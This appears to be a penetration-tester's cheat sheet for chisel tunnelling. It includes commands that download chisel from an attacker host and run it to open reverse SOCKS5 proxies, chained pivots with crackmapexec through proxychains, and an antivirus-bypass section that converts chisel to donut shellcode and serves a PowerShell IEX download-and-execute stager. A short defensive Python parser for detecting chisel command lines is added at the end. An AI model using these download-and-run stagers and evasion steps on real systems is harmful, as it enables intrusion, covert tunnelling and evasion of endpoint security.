######
Chisel
######

https://github.com/jpillora/chisel

https://github.com/jpillora/chisel/releases/latest

***************
Chisel Instance
***************

I use only one instance to manage multiple proxy endpoints.

(replace ``bla:bla`` with other random creds if you want to)

.. code-block:: bash

   docker run --name chisel --rm -d -p0.0.0.0:443:80 jpillora/chisel server --socks5 --reverse -v --auth bla:bla --port 80
   docker inspect --format '{{ .NetworkSettings.IPAddress }}' chisel  # Get container IP, probably 172.17.0.2
   docker logs chisel -f  # Stream logs

****************
Target as Socks5
****************

Upload chisel on the target and link it to the chisel server.

Don't forget to set credentials if you replaced them in the first place.

POWERSHELL

.. code-block:: powershell

   (New-Object System.Net.WebClient).DownloadFile("http://ATTACKER/chisel.exe", "$env:TEMP\chisel.exe")
   Start-Process -NoNewWindow -FilePath "$env:TEMP\chisel.exe" -ArgumentList "client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks"

CMD ALTERNATIVE

.. code-block:: batch

   START "" "/users/user/chisel.exe" client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks
   REM If you need to kill all chisel processes:
   REM taskkill /F /IM chisel.exe

Linux

.. code-block:: bash

   wget http://ATTACKER/chisel -O /tmp/chisel; chmod 755 /tmp/chisel
   /tmp/chisel client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks &

Great, our chisel container now listens on port 5000 as a SOCKS5 proxy!

Here is an example of how to use it with proxychains:

.. code-block:: bash

   echo -e '[ProxyList]\nsocks5 172.17.0.2 5000' > /tmp/TARGET1
   proxychains -q -f /tmp/TARGET1 crackmapexec smb TARGET_NETWORK

******************
Target as Listener
******************

You want the target to listen on a port and forward the traffic back to you?

Let's say you want to chain multiple chisel clients:

TARGET2 => TARGET1:7777 => ATTACKER:443

BASH

.. code-block:: bash

   # Target1
   chisel client -v --auth bla:bla ATTACKER:443 TARGET1IP:7777:ATTACKER:443 &
   # Target2 (socks5)
   chisel client -v --auth bla:bla TARGET1IP:7777 R:0.0.0.0:6000:socks &
   # Attacker
   echo -e '[ProxyList]\nsocks5 172.17.0.2 6000' > /tmp/TARGET2
   proxychains -q -f /tmp/TARGET2 crackmapexec smb TARGET2_NETWORK

*************
Win AV bypass
*************

(You need the loadsc script: https://offensive.run/winecosystem/lpe/README.html#av-bypass)

.. code-block:: bash

   LHOST="192.168.45.216"
   LPORT=443
   PARAMS="client -v --auth bla:bla $LHOST:$LPORT R:0.0.0.0:5000:socks"
   INPUT_FILE='/var/www/html/chisel.exe'
   SHELLCODE_OUTPUT_FILE='/tmp/chiselsc'
   ENCODED_PAYLOAD_FILE='/var/www/html/chiselsc'
   python3 -c "import donut; donut.create(thread=0,compress=2,bypass=1,exit_opt=3,arch=2,file='$INPUT_FILE',output='$SHELLCODE_OUTPUT_FILE',params=bytes.fromhex('$( echo -en "$PARAMS" | xxd -plain | tr -d '\n' )').decode('utf-8'))"
   cat "$SHELLCODE_OUTPUT_FILE" | xxd -plain | tr -d '\n' | rev | gzip | sudo tee "$ENCODED_PAYLOAD_FILE" >/dev/null
   cat <<'EOF' | sudo tee /var/www/html/startchisel
   $loadsc="$web/loadsc"; $sc="$web/chiselsc"; $python="$web/python.zip"; $dir="$env:TEMP";
   $Exists = Test-Path "$dir\python\";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,"$dir\python.zip");Add-Type -assembly "system.io.compression.filesystem";[io.compression.zipfile]::ExtractToDirectory("$dir\python.zip", "$dir\python\")};
   $arguments = @("-c","""import urllib.request as r;exec(bytes.fromhex(r.urlopen('$loadsc').read()[::-1].decode('utf-8')));load('$sc')""")
   Start-Process -NoNewWindow -FilePath "$dir\python\python.exe" -ArgumentList $arguments
   EOF

Then call chisel:

.. code-block:: powershell

   $web="http://192.168.45.216";IEX(New-Object Net.WebClient).downloadString("$web/startchisel")
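For the blue-team side of the "Target as Socks5" and "Target as Listener" sections above, here is an added triage helper (not part of the original notes and not chisel's own code) that decodes the remote specs of a ``chisel client`` command line pulled from process-creation telemetry, so an analyst can see which side opens a listener, on which address and port, and whether it is a reverse SOCKS proxy. The parsing follows chisel's documented remote syntax as I read it; the flag list and the sample command lines in the test are my own constructions.

```python
# Added example (not from the original page): decode the remotes of a "chisel client" command
# line found in process-creation telemetry (e.g. a Sysmon Event ID 1 CommandLine) so the
# listener each remote opens can be triaged. Parsing follows chisel's documented remote syntax
# [R:][local-host:][local-port:][remote-host:]remote-port[/proto]; IPv6 brackets are not handled.
import re
import shlex
from collections import namedtuple

# chisel client flags that consume the next argv token (boolean flags such as -v do not)
VALUE_FLAGS = {"--auth", "--fingerprint", "--keepalive", "--max-retry-count", "--max-retry-interval",
               "--proxy", "--header", "--hostname", "--sni", "--tls-ca", "--tls-key", "--tls-cert"}
CHISEL_BIN = re.compile(r"(?:^|[\\/])chisel(?:\.exe)?$", re.IGNORECASE)
# reverse=True: the chisel *server* opens the listener; remote_host "socks": client acts as SOCKS5 proxy
Remote = namedtuple("Remote", "reverse local_host local_port remote_host remote_port")

def parse_remote(spec: str) -> Remote:
    """Fill chisel's defaults: host 0.0.0.0, local-port = remote-port, SOCKS listener 1080."""
    reverse = spec.startswith("R:")
    parts = (spec[2:] if reverse else spec).split("/")[0].split(":")  # drop a /tcp or /udp suffix
    if parts[-1] == "socks":                                # listener fields precede the keyword
        rhost, rport, local = "socks", "", parts[:-1]
    elif len(parts) >= 2 and not parts[-2].isdigit():       # ...:remote-host:remote-port
        rhost, rport, local = parts[-2], parts[-1], parts[:-2]
    else:                                                   # bare port -> server-side 0.0.0.0:port
        rhost, rport, local = "0.0.0.0", parts[-1], parts[:-1]
    lhost = local[0] if len(local) == 2 else "0.0.0.0"
    lport = local[-1] if local else (rport or "1080")
    if len(parts) > 4 or not lport.isdigit() or not (rport.isdigit() or rhost == "socks"):
        raise ValueError(f"invalid chisel remote: {spec!r}")
    return Remote(reverse, lhost, lport, rhost, rport)

def chisel_remotes(cmdline: str) -> list[Remote]:
    """Remotes of a 'chisel client' invocation; [] when the command line is not one."""
    argv = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    starts = [i + 2 for i, t in enumerate(argv[:-1]) if CHISEL_BIN.search(t) and argv[i + 1] == "client"]
    positional, skip = [], False
    for tok in (argv[starts[0]:] if starts else []):
        if skip or tok.startswith("-"):
            skip = not skip and tok in VALUE_FLAGS           # a --flag=value token needs no skip
            continue
        positional.append(tok)
    return [parse_remote(r) for r in positional[1:]]        # positional[0] is the server URL

def triage(cmdlines: list[str]) -> list[str]:
    notes = []
    for line in cmdlines:
        for r in chisel_remotes(line):
            side = "chisel server" if r.reverse else "this host"
            dest = "SOCKS5 egress via this host" if r.remote_host == "socks" else f"{r.remote_host}:{r.remote_port} via server"
            notes.append(f"{side} listens on {r.local_host}:{r.local_port} -> {dest}")
    return notes
```

Feed ``triage`` the CommandLine field of your process-creation events; a note that says the chisel server listens with SOCKS5 egress via this host is exactly the reverse-SOCKS pattern the sections above set up.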